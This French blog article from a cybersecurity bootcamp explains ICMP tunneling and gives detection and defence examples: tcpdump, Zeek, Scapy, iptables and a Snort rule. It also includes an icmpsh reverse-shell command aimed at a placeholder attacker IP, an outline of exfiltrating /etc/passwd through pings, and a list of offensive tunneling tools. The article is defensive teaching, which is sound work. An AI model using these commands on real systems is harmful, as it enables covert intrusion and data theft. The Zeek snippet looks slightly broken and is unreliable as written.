Bootcamp Cyber 8200
Pourquoi NousProgrammeÀ Qui S'Adresse Ce ProgrammeProgramme DétailléTarifsFAQBlogS'inscrire Maintenant
Bootcamp Cyber 8200
Pourquoi NousProgrammeÀ Qui S'Adresse Ce ProgrammeProgramme DétailléTarifsFAQBlog
S'inscrire Maintenant

Select Language

© 2026 Bootcamp Cyber 8200

Bootcamp Cyber 8200

Formation en cybersécurité d'élite inspirée par l'unité 8200 d'Israël, axée sur le pratique et le développement de compétences.

Liens Rapides

  • Accueil
  • Programme
  • Programme Détaillé
  • Tarifs
  • FAQ

Contact

Suivez-nous sur les réseaux sociaux

© 2026 Bootcamp Cyber 8200. Tous droits réservés.

Qu'est-ce que le tunneling ICMP et comment s'en protéger

Qu'est-ce que le tunneling ICMP et comment s'en protéger

8/24/2026
Le tunneling ICMP est une technique furtive utilisée par les attaquants pour passer des commandes malveillantes ou exfiltrer des données à travers les défenses réseau en les dissimulant dans le trafic ICMP, comme les pings. Découvrez comment cela fonctionne, pourquoi c'est efficace, et les...

Qu'est-ce que le Tunnel ICMP et Comment se Protéger

Introduction au Tunnel ICMP

Le tunnel ICMP, parfois appelé "attaques souterraines basées sur le ping", est une technique d'attaque furtive du réseau où des acteurs malveillants dissimulent des activités de commande et contrôle (C2) ou d'exfiltration de données dans des paquets ICMP (Internet Control Message Protocol), en apparence inoffensifs. Étant donné que l'ICMP—généralement connu pour les requêtes ping—passe souvent inaperçu par les systèmes de pare-feu et de détection d'intrusion, il représente un véritable défi pour les équipes de sécurité informatique.

Dans ce guide, nous expliquerons ce qu'est le tunnel ICMP, comment les attaquants l'implémentent, pourquoi c'est une méthode d'évasion attrayante, et—ce qui est le plus important—comment les professionnels de la sécurité et les administrateurs réseau peuvent détecter et se défendre contre les attaques de tunnel ICMP. Nous partirons d’explications pour débutants jusqu'à la détection avancée, incluant des exemples concrets et des extraits de code pour scanner, surveiller, et analyser le trafic réseau à la recherche d'activité de tunnel ICMP.


Table des Matières

  • Qu'est-ce que l'ICMP? Les Bases
  • Qu'est-ce que le Tunnel ICMP?
  • Comment Fonctionne le Tunnel ICMP?
  • Pourquoi les Attaquants Utilisent le Tunnel ICMP
  • Exemples Réels d'Attaques de Tunnel ICMP
  • Détecter le Tunnel ICMP en Pratique
  • Scanner l'Activité du Tunnel ICMP
  • Se Protéger Contre le Tunnel ICMP
  • Atténuation Avancée : Modèles de Détection Sans État
  • Conclusion
  • Références

Qu'est-ce que l'ICMP? Les Bases

Le Protocole de Message de Contrôle Internet (ICMP) est une partie fondamentale de la suite de protocoles Internet. Il est conçu pour les messages d'erreur, diagnostics réseau, et messageries de statut.

Faits Clés :

  • ICMP est de niveau 3 : Il se trouve à la couche Réseau au-dessus d'IP.
  • Messages Communes : Inclut la Requête Echo et Réponse Echo (ping), Destination Inaccessible, Temps Expiré, et d'autres.
  • Usages Typiques : Diagnostic de réseau (par ex. ping, traceroute), rapport d'erreurs entre appareils réseau.

Exemple : Trafic ICMP de Base

Lorsque vous exécutez :

ping google.com

Votre ordinateur génère une série de paquets ICMP de Requête Echo, et Google (s'il autorise le ping) répond avec des paquets ICMP de Réponse Echo.


Qu'est-ce que le Tunnel ICMP?

Le tunnel ICMP est une technique qui encapsule des données de charge utile arbitraires dans des paquets ICMP. Ces données peuvent inclure des fichiers exfiltrés, des commandes shell, ou même une connexion TCP entière, toutes dissimulées à l'intérieur de requêtes ou réponses ping en apparence normales.

Étant donné que les organisations permettent souvent au trafic ICMP de traverser leurs pare-feux périmétriques (pour le dépannage légitime), les attaquants exploitent cette confiance pour faire passer des données dissimulées ou créer des portes dérobées dans un réseau.

Définition :

Le tunnel ICMP est une méthode de communication cachée où les attaquants encodent des données malveillantes ou non autorisées dans des paquets ICMP pour contourner les contrôles d'accès du réseau.


Comment Fonctionne le Tunnel ICMP?

Le tunnel ICMP exploite la structure des paquets ICMP—surtout la Requête/Réponse Echo—pour transporter des données supplémentaires, cachées.

Anatomie du Paquet ICMP

  • Type, Code : Spécifie le message ICMP (par ex. 8 = Requête Echo, 0 = Réponse Echo)
  • Checksum : Pour la détection d'erreurs
  • Identifiant et Numéro de Séquence : Pour le suivi
  • Données : Champ optionnel, utilisé par les attaquants pour transporter des données cachées

Processus de Tunnelisation Étape par Étape

  1. L'attaquant compromet un hôte : Il accède à un appareil à l'intérieur du réseau cible.
  2. Lance un Client de Tunnel ICMP : Le client encode des commandes ou des données à l'intérieur des paquets ICMP Echo—souvent en utilisant des outils comme icmpsh, ptunnel, ou des scripts personnalisés.
  3. Paquets ICMP envoyés au Serveur C2 : Le serveur de l'attaquant en dehors du pare-feu reçoit les paquets et décode la charge utile.
  4. Réponses encodées : Le serveur distant envoie des instructions ou des réponses en retour, dissimulées dans des paquets ICMP de Réponse Echo.
  5. Contourner le Pare-feu : Étant donné que le trafic ressemble à une activité ping normale, il est souvent ignoré lors de l'inspection et autorisé par les règles réseau par défaut.

Exemple : Paquet de Tunnel ICMP

Un paquet ICMP de Requête Echo normal pourrait ressembler à ceci :

Champ Valeur Exemple
Type 8 (Requête Echo)
Code 0
Checksum 6920
Identifiant 13
Numéro de Séquence 250
Données "Hello, world!"

Une attaque de tunnel ICMP pourrait placer des données exfiltrées encodées en base64 dans la section "Données".


Pourquoi les Attaquants Utilisent le Tunnel ICMP

Contournement de la Sécurité Périmétrique

Les pare-feux bloquent généralement les connexions externes directes (par ex., SSH sortant, exfiltration via HTTP/S).
Cependant, l'ICMP est fréquemment en liste blanche pour permettre le dépannage réseau, même au-delà des frontières organisationnelles.

C2 (Commande et Contrôle)

Les acteurs de menaces persistantes avancées (APT) utilisent des tunnels ICMP pour gérer des hôtes compromis, envoyer des commandes, et extraire des fichiers—tout cela sans déclencher d'alertes réseau classiques.

Techniques d'Évasion

  • Fractionnement de Charge Utile : Diviser les données en petits fragments ICMP.
  • Chiffrement : Obfuser la charge utile avec chiffrement ou encodage (Base64, XOR).
  • Imitation de Trafic Normal : Générer des paquets ICMP à des intervalles normaux, ou seulement en réponse à des requêtes légitimes.

Outils pour le Tunnel ICMP

Une gamme d'outils de sécurité offensive open source supporte le tunnel ICMP:

  • icmpsh : Un shell inversé sur ICMP.
  • ptunnel : Tunnel les connexions TCP sur ICMP.
  • Hans : Tunnellisation TCP, y compris ICMP.
  • Scripts personnalisés : De nombreux attaquants développent des outils personnalisés pour contourner la détection basée sur signature.

Exemples Réels d'Attaques de Tunnel ICMP

Exemple 1 : Exfiltration de Données

Une menace interne ou un malware sur un poste de travail souhaite faire passer des fichiers sensibles hors de l'organisation.

Étapes :

  1. L'hôte compromis se connecte au C2 de l'attaquant en utilisant un client de tunnel ICMP.
  2. Les fichiers (par ex., /etc/passwd) sont divisés, encodés, et cachés à l'intérieur de multiples Requêtes Echo.
  3. Le serveur distant de l'attaquant collecte les paquets et reconstruit le fichier volé.

Exemple 2 : Shell Distant sur ICMP

Les testeurs de pénétration et les attaquants déploient des outils comme icmpsh :

  • L'hôte interne lance icmpsh -t <ip_attaquant>.
  • Le serveur de l'attaquant (en dehors du réseau) écoute les Requêtes Echo ICMP, décode et répond avec des réponses de shell via les Réponses Echo.
  • La communication shell bidirectionnelle est maintenant établie sans ouvrir de ports sortants risqués.

Étude de Cas : Tunnels ICMP dans la Nature

Des rapports ont émergé sur des APTs et des malwares (notamment Backdoor.Win32.ICMPdoor) utilisant le tunnel ICMP pour un accès persistant dans des environnements de haute sécurité qui autrement bloquent tout sauf HTTP/HTTPS—et ICMP.


Détecter le Tunnel ICMP en Pratique

La détection du tunnel ICMP repose sur l'identification de modèles anormaux ou l'inspection des charges utiles des paquets ICMP.

Ce qu'il Faut Surveiller

  • Taille de paquet ICMP inhabituelle : La charge utile de ping normale est de 32–56 octets; l'exfiltration nécessite beaucoup plus.
  • Volume/fréquence élevée : Requêtes Echo ICMP excessives ou régulières vers des adresses externes rares.
  • Données de grande taille ou non imprimables dans les charges utiles : Chaînes encodées/chiffrées plutôt que de simples textes de test.
  • Points de terminaison inattendus : Hôtes internes "pingant" des IPs publiques suspectes.

Outils pour l'Analyse du Trafic ICMP

tcpdump

Un outil de capture de paquets souvent utilisé pour inspecter le trafic ICMP.

# Capture tout le trafic ICMP, sortie détaillée
sudo tcpdump -n -v icmp

Exemple de sortie suspecte (tronquée) :

IP 10.10.10.5 > 203.0.113.10: ICMP echo request, id 4567, seq 3344, longueur 1024

Note : 1024 octets est beaucoup plus grand que la charge utile ICMP de ping normale !

Wireshark

Un analyseur graphique de paquets.

  1. Filtrer le trafic : icmp
  2. Rechercher des paquets Echo avec de grandes/étranges charges utiles ; clic droit et "Suivre le Flux ICMP" pour voir le contenu.
Zeek (anciennement Bro)

Un puissant outil de surveillance de la sécurité réseau avec des scripts ICMP intégrés.

Script pour enregistrer les charges utiles ICMP anormales :

event icmp_message(c: connection, icmp: icmp_hdr)
    {
    if ( c$id$orig_h !in Site::internal_networks )
        {
        # Enregistrer ou alerter sur les grandes charges utiles
        if ( c$payload && |c$payload| > 500 )
            local alert = fmt("Grande charge utile ICMP de %s à %s", c$id$orig_h, c$id$resp_h);
        }
    }
Ligne de Commande Linux (Bash/Python)

Exemple Bash : Enregistrer toutes les charges utiles de ping sortantes.

sudo tcpdump -nn -X icmp and host 203.0.113.10 | grep -A 10 "ICMP"

Exemple Python : Analyser pcap pour des charges utiles ICMP anormales

from scapy.all import *

def scan_icmp_pcap(pcap_file):
    packets = rdpcap(pcap_file)
    for pkt in packets:
        if pkt.haslayer(ICMP):
            if len(pkt[ICMP].payload) > 100:
                print(f"ICMP suspect de {pkt[IP].src} à {pkt[IP].dst} : {bytes(pkt[ICMP].payload)[:30]}...")

scan_icmp_pcap('capture.pcap')

Scanner l'Activité du Tunnel ICMP

Pour chasser de manière proactive l'utilisation abusive de tunnels ICMP, les analyses régulières et la détection d'anomalies sont vitales.

Étape 1 : Baseline de l'Utilisation ICMP

  • Surveiller le trafic ICMP normal : volume, destinations, taille des paquets.
  • Identifier les points de terminaison internes et externes typiques.

Étape 2 : Analyser les Anomalies

Utilisez des outils comme ELK stack, Zeek, Wireshark pour :

  • Alerter sur des paquets ICMP inhabituellement grands ou fréquents.
  • Corréler les sources/destinations ICMP avec des renseignements sur les menaces connus.

Étape 3 : Scanner sur Linux/Unix

Trouver les plus grands paquets ICMP en temps réel :

sudo tcpdump -ni eth0 icmp and greater 200

Lister les tailles de paquets à partir de la capture :

sudo tcpdump -nn -r capture.pcap icmp | awk '{print $NF}' | sort | uniq -c | sort -nr

Étape 4 : Scripts Automatisés

Python Scapy : Rapporter les requêtes echo avec de grandes charges utiles

from scapy.all import *

def detect_large_icmp(pcap_file):
    for pkt in rdpcap(pcap_file):
        if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:
            if len(pkt[ICMP].payload) > 200:
                print(f"Grande Requête Echo ICMP : {pkt[IP].src} -> {pkt[IP].dst}, taille={len(pkt[ICMP].payload)}")
detect_large_icmp("icmp_traf.pcap")

Se Protéger Contre le Tunnel ICMP

1. Restreindre le Trafic ICMP

  • Politique de Pare-feu : Bloquer l'ICMP externe, ou au moins restreindre aux stations de gestion connues. Ne permettez que Requête/Réponse Echo si nécessaire.
  • Filtrage de Sortie : Empêcher les hôtes internes d'envoyer de l'ICMP à des adresses externes sauf pour des cas de confiance.

Exemple : Bloquer l'ICMP sortant avec iptables

sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP

2. Inspecter les Charges Utiles ICMP

  • Déployer des solutions IDS/IPS (comme Snort, Suricata) avec des signatures de tunnel ICMP ou des règles pour des charges utiles anormales.
  • Surveiller la taille de la charge utile, la fréquence, et la destination.

Exemple de Règle Snort :

alert icmp any any -> any any (msg:"Taille de Charge Utile ICMP Suspecte"; dsize:>200; sid:1000001; rev:1;)

3. Enregistrer et Alerter

  • Assurez-vous d'enregistrer tout le trafic ICMP, en particulier les charges utiles grandes ou étranges.
  • Configurez des alertes SIEM pour les anomalies.

4. Éducation des Utilisateurs et Moindre Privilège

  • Empêchez les utilisateurs ordinaires / stations de travail piratées de générer de l'ICMP vers des hôtes externes.
  • Désactivez l'ICMP sortant sur tous les appareils sauf ceux nécessaires.

5. Détection Avancée des Menaces

  • Utilisez l'apprentissage automatique / heuristiques (voir les intégrations Zeek/Suricata) pour signaler les modèles de trafic correspondant aux outils de tunnel ICMP connus.
  • Consultez régulièrement les journaux de point d'extrémité / réseaux.

6. Corriger et Maintenir

  • Mettez à jour les appareils et logiciels réseau pour corriger les vulnérabilités de gestion ICMP.
  • Restez informé sur les outils d'attaque actuels et les signatures.

Atténuation Avancée : Modèles de Détection Sans État

Des recherches montrent que la surveillance sans état—observer les flux et tailles de paquets ICMP, non seulement leur état ou séquence—peut être un moyen évolutif et à faible impact pour détecter le tunneling.

Principes de la Détection Sans État

  • Observer chaque paquet indépendamment : Détecter les modèles suspects basés sur la taille et la fréquence de chaque paquet ICMP.
  • Pas de suivi de session nécessaire : Moins de ressources nécessaires pour les pare-feux / routeurs.
  • Automatiser les alertes sur les seuils : Par exemple, signaler tous les paquets Echo ICMP >500 octets.

Impact sur la Performance

Selon Singh & Nordström, les modèles sans état peuvent efficacement signaler les canaux secrets sans affecter significativement les hôtes finaux ou les routeurs—même à grande échelle.


Conclusion

Le tunnel ICMP représente une menace lente et discrète qui s'intègre parfaitement dans les opérations réseau légitimes, rendant la détection et la défense difficiles pour les équipes bleues. Avec l'utilisation généralisée de l'ICMP pour le diagnostic et la fréquence à laquelle les organisations permettent à un tel trafic de passer à travers leurs pare-feux, il est un vecteur idéal pour les attaquants établissant une commande et contrôle clandestine, exfiltrant des données sensibles, ou accédant à des hôtes compromis.

Points Clés à Retenir

  • Le tunnel ICMP exploite des protocoles de confiance pour des communications cachées.
  • Les attaquants sophistiqués l'utilisent pour C2 et exfiltration de données.
  • La détection nécessite la surveillance des tailles de paquets ICMP inhabituelles, de la fréquence, et des destinations.
  • La défense est un mélange de filtrage de sortie solide, de restriction ICMP, d'analyse de charges utiles, et de journalisation/alerte automatisée.
  • Les modèles de détection sans état permettent une défense évolutive sans dégrader les performances réseau.

En établissant une ligne de base de l'activité ICMP légitime de votre réseau et en employant à la fois une détection basée sur les signatures et sur les anomalies, votre organisation peut neutraliser ce vecteur de menaces furtif avant qu'il ne provoque une perte de données ou une compromission supplémentaire.


Références

  • Detect and Stop ICMP Tunneling – ExtraHop Blog
  • What is ICMP Tunneling? – DeepStrike
  • Malicious ICMP Tunneling: Defense against the Vulnerability – Semantic Scholar
  • ICMP Tunnels and Covert Channels – PacketLife.net
  • icmpsh project – Github
  • Ping Tunnel (ptunnel)
  • Snort – Network Intrusion Detection System
  • Wireshark – Network Protocol Analyzer
  • Zeek – Network Security Monitor

Sécurisez votre périmètre—et ne négligez jamais le humble ping !

🚀 PRÊT À PASSER AU NIVEAU SUPÉRIEUR ?

Faites passer votre carrière en cybersécurité au niveau supérieur

Si vous avez trouvé ce contenu utile, imaginez ce que vous pourriez accomplir avec notre programme de formation élite complet de 47 semaines. Rejoignez plus de 1 200 étudiants qui ont transformé leur carrière grâce aux techniques de l'Unité 8200.

S'inscrire au programme completVoir le programme
Taux de placement de 97%
Techniques d'élite de l'Unité 8200
42 Labs pratiques